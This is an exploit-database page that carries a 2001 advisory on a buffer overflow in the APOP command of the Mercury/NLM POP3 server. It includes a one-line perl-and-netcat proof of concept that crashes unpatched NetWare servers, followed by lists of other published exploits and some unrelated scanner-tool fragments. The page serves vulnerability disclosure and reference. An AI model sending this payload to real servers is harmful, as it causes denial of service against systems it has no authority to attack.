Menu

Search for hundreds of thousands of exploits

"Mercury/NLM 1.4 - Buffer Overflow"

Author

Exploit author

"Przemyslaw Frasunek"

Platform

Exploit platform

multiple

Release date

Exploit published date

2001-04-21

Download file

1
2
3
4
5
6
7
source: https://www.securityfocus.com/bid/2641/info

Mercury MTA is a mail-transfer agent available for Novell NetWare and Windows NT. Novell versions of the Mercury POP3 server prior to 1.48 are vulnerable to a buffer overflow caused by inadequate string handling for the APOP authentication command.

Because the overflow occurs in an authentication command parser, unauthenticated remote users can trigger the overflow. It is unknown whether the overflow can lead to arbitrary code execution, but proof-of-concept code is available that will crash the NetWare server, requiring a reboot. 

perl -e 'print "APOP " . "a"x2048 . " " . "a"x2048 . "\r\n"' | nc mercury_host 110
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Expense Management System - 'description' Stored Cross Site Scripting" webapps multiple "Nikhil Kumar"
2020-12-02 "Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting" webapps multiple "Parshwa Bhavsar"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Under Construction Page with CPanel 1.0 - SQL injection" webapps multiple "Mayur Parmar"
Release Date Title Type Platform Author
2009-10-08 "FreeBSD 7.2 - VFS/devfs Race Condition" local freebsd "Przemyslaw Frasunek"
2009-10-08 "FreeBSD 6.4 - 'pipeclose()'/'knlist_cleardel()' Race Condition" local freebsd "Przemyslaw Frasunek"
2009-08-24 "FreeBSD 6.1 - 'kqueue()' Null Pointer Dereference Privilege Escalation" local freebsd "Przemyslaw Frasunek"
2009-08-14 "Linux Kernel 2.x - 'sock_sendpage()' Local Privilege Escalation (4)" local linux "Przemyslaw Frasunek"
2005-06-28 "Solaris 9/10 - 'ld.so' Local Privilege Escalation (2)" local solaris "Przemyslaw Frasunek"
2005-06-28 "Solaris 9/10 - 'ld.so' Local Privilege Escalation (1)" local solaris "Przemyslaw Frasunek"
2005-06-24 "Sun Solaris 10 Traceroute - Multiple Local Buffer Overflow Vulnerabilities" local solaris "Przemyslaw Frasunek"
2003-12-20 "Tcpdump 3.x - L2TP Parser Remote Denial of Service" dos linux "Przemyslaw Frasunek"
2002-04-11 "OpenBSD 2.9/3.0 - Default Crontab Root Command Injection" local openbsd "Przemyslaw Frasunek"
2001-12-18 "ZYXEL Prestige 681 SDSL Router - IP Fragment Reassembly" remote hardware "Przemyslaw Frasunek"
2001-09-17 "FreeBSD 4.3/4.4 - Login Capabilities Privileged File Reading" local freebsd "Przemyslaw Frasunek"
2001-04-21 "Mercury/NLM 1.4 - Buffer Overflow" dos multiple "Przemyslaw Frasunek"
1999-08-31 "Martin Stover Mars NWE 0.99 - Local Buffer Overflow" local linux "Przemyslaw Frasunek" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected